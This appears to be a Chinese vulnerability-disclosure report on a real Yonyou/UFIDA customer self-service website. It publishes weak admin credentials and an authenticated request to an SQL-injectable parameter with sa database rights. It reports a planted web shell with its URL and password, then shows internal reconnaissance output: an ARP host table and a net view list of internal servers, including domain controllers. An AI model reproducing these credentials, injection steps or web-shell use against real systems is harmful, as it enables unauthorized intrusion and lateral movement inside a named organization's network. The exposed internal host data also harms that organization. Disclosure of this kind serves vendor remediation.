### 简要描述:
弱口令、sql注射、getshell
### 详细说明:
系统地址:
http://vip.ufida.com.cn/Frame/Index.aspx
[<img src="https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg" alt="QQ截图20151021162136.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg)
弱口令帐号:adminnc
密码:adminnc
[<img src="https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg" alt="QQ截图20151021162437.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg)
在自助查询处,发现注入(需要登录,注意cookie有时效)
[<img src="https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg" alt="QQ截图20151021162521.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg)
```
GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vip.ufida.com.cn
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe
```
[<img src="https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg" alt="QQ截图20151021163123.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg)
支持union
sa权限
[<img src="https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg" alt="QQ截图20151021163229.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg" alt="QQ截图20151021163307.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg)
可内网
[<img src="https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg" alt="QQ截图20151021163526.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg)
[<img src="https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg" alt="QQ截图20151021164007.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg)
找到web根路径后写shell
```
http://vip.ufida.com.cn/wooyun.aspx
```
密码wpp
[<img src="https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg" alt="QQ截图20151021164403.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg)
支持union就是快
```
D:\E_data\战略客户自助系统网站\wwwroot\> arp -a
Interface: 192.168.8.90 --- 0x10003
Internet Address Physical Address Type
192.168.8.2 00-50-56-83-0c-49 dynamic
192.168.8.3 00-50-56-83-0c-50 dynamic
192.168.8.4 00-50-56-83-30-ab dynamic
192.168.8.7 00-50-56-83-56-6e dynamic
192.168.8.9 00-0f-e2-30-7f-c9 dynamic
192.168.8.32 00-50-56-83-4b-1a dynamic
192.168.8.38 00-21-28-14-c9-ba dynamic
192.168.8.57 70-e2-84-07-31-18 dynamic
192.168.8.67 c4-ca-d9-c6-d0-58 dynamic
192.168.8.72 70-e2-84-07-31-e4 dynamic
192.168.8.77 00-15-17-ce-9f-31 dynamic
192.168.8.80 90-e2-ba-5d-ac-1f dynamic
192.168.8.83 90-e2-ba-57-f9-97 dynamic
192.168.8.105 e8-39-35-22-42-42 dynamic
192.168.8.112 3c-e5-a6-af-21-b5 dynamic
192.168.8.113 00-1a-4b-de-ae-ae dynamic
192.168.8.114 70-e2-84-07-31-18 dynamic
192.168.8.118 00-1e-68-78-f8-a9 dynamic
192.168.8.119 70-e2-84-07-31-e4 dynamic
192.168.8.134 00-50-56-83-36-20 dynamic
192.168.8.135 00-15-17-b7-1b-15 dynamic
192.168.8.136 00-50-56-83-00-02 dynamic
192.168.8.137 00-50-56-83-00-36 dynamic
192.168.8.138 00-50-56-83-53-95 dynamic
192.168.8.151 00-25-b3-25-a6-a2 dynamic
192.168.8.153 00-50-56-83-0b-84 dynamic
192.168.8.156 00-21-28-14-ca-92 dynamic
192.168.8.164 00-50-56-83-4a-e9 dynamic
192.168.8.168 00-50-56-83-12-69 dynamic
192.168.8.174 70-e2-84-07-31-e4 dynamic
192.168.8.180 00-50-56-83-6c-e3 dynamic
192.168.8.184 00-50-56-83-0c-8e dynamic
192.168.8.192 00-50-56-83-2f-8f dynamic
192.168.8.196 00-50-56-83-3b-08 dynamic
192.168.8.197 c8-9c-dc-33-ad-37 dynamic
192.168.8.199 00-1a-4b-de-18-82 dynamic
192.168.8.200 00-0c-29-29-0b-1c dynamic
192.168.8.201 00-15-17-5f-0d-59 dynamic
192.168.8.203 00-e0-81-d2-d8-49 dynamic
192.168.8.210 d4-85-64-4b-c0-b8 dynamic
192.168.8.211 00-50-56-83-5c-e1 dynamic
192.168.8.212 f8-bc-12-4e-9c-06 dynamic
192.168.8.213 00-50-56-83-00-1d dynamic
192.168.8.214 00-e0-81-de-99-5b dynamic
192.168.8.215 00-00-5e-00-01-0f dynamic
192.168.8.216 00-23-7d-57-8a-88 dynamic
192.168.8.217 00-23-7d-56-60-dc dynamic
192.168.8.218 00-23-7d-56-60-dc dynamic
192.168.8.219 18-a9-05-60-b9-e0 dynamic
192.168.8.220 18-a9-05-46-3a-08 dynamic
192.168.8.221 00-14-5e-1c-81-3f dynamic
192.168.8.222 00-00-5e-00-01-05 dynamic
192.168.8.223 00-50-56-83-63-72 dynamic
192.168.8.224 18-a9-05-53-0f-64 dynamic
192.168.8.225 44-1e-a1-4d-31-06 dynamic
192.168.8.226 00-50-56-83-46-9f dynamic
192.168.8.227 00-00-5e-00-01-09 dynamic
192.168.8.228 00-50-56-83-00-8d dynamic
192.168.8.229 00-a0-b8-56-26-92 dynamic
192.168.8.230 00-21-97-02-8f-c1 dynamic
192.168.8.231 00-50-56-83-05-f8 dynamic
192.168.8.233 00-21-28-f1-7e-ce dynamic
192.168.8.234 00-1a-4b-de-bf-7a dynamic
192.168.8.236 00-e0-81-dc-26-4b dynamic
192.168.8.237 00-e0-81-d8-54-e7 dynamic
192.168.8.238 00-50-56-83-2b-41 dynamic
192.168.8.239 00-a0-b8-56-26-50 dynamic
192.168.8.240 00-15-17-da-a6-50 dynamic
192.168.8.241 18-a9-05-40-af-d2 dynamic
192.168.8.242 00-e0-81-de-9b-96 dynamic
192.168.8.243 00-21-97-42-80-d8 dynamic
192.168.8.244 3c-d9-2b-f6-ef-70 dynamic
192.168.8.245 00-e0-81-d7-72-37 dynamic
192.168.8.246 00-50-56-83-47-d8 dynamic
192.168.8.247 00-90-fb-44-fe-8a dynamic
192.168.8.248 c4-ca-d9-de-c2-8a dynamic
192.168.8.249 c4-ca-d9-de-32-01 dynamic
192.168.8.251 00-50-56-83-29-2c dynamic
192.168.8.253 00-15-60-a2-94-81 dynamic
192.168.8.254 00-e0-86-17-b1-0d dynamic
```
[<img src="https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg" alt="QQ截图20151021164507.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg)
[<img src="https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg" alt="QQ截图20151021164542.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg)
```
D:\E_data\战略客户自助系统网站\wwwroot\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\BG-DC-01
\\BG-DC-02
\\BGVC
\\BI
\\CAIWUAPPS CaiWuApps
\\CASERVER
\\CWHR
\\DDFWS-C117DB6F3
\\EVENTLOG
\\FTPSERVER
\\GSALEDB
\\IMC-01 imc-01
\\IMC-02 imc-02
\\IMC-03
\\IMC-04 imc-04
\\IMCPT
\\IT-36800
\\IT_FAWEN_09_25
\\ITCOMMDATASERVE
\\ITDATABASE
\\ITTFS
\\ITTFS2010
\\JTSJJCB-2012-01
\\KMS08
\\MSNCASRV_09_26
\\PORTAL8211 portal
\\SALEAPP
\\SALES_MANAGEMEN
\\SUP2008
\\TKR TKR
\\U8SERVICE
\\UF-BG-TEMPLATES
\\UF200703009
\\UF200703055A
\\UF200703073
\\UF200802416
\\UF200903057
\\UF200903072
\\UF200903079
\\UF201003115
\\UF201103087
\\UF2013-PCAS
\\UFAPP
\\UFBGDC01
\\UFCUSDB
\\UFCWSERVER2
\\UFEDGESRV
\\UFGOV-KAOQIN
\\UFGROUP ufgroup
\\UFGROUP2013
\\UFGROUPAPP2
\\UFIDA-D79A6DC9F
\\UFIDA-WINS
\\UFIDASERVER1
\\UFIDASRV2
\\UFIDAWEBDATA
\\UFNAS1
\\UFPARK
\\UFPARK_BAK_10_0
\\UFPMP
\\UFPORTALSRV ufpo
\\UFREGISTER2
\\UFSEA
\\UFSEADB
\\UFSEARCH
\\UFSERVERDB
\\UFTDC11
\\VIP
\\VPN_LOG
\\WEBSUPPORT we
\\WIN-7NNI89H987C
\\WIN-9QKG6QS0TNM
\\WSUS02
\\XHZWEBCOUNT
\\XMGLNET UFPMP
\\YONYOU-129D63B7
命令成功完成。
```
京公网安备 11010502034610号
暂无评论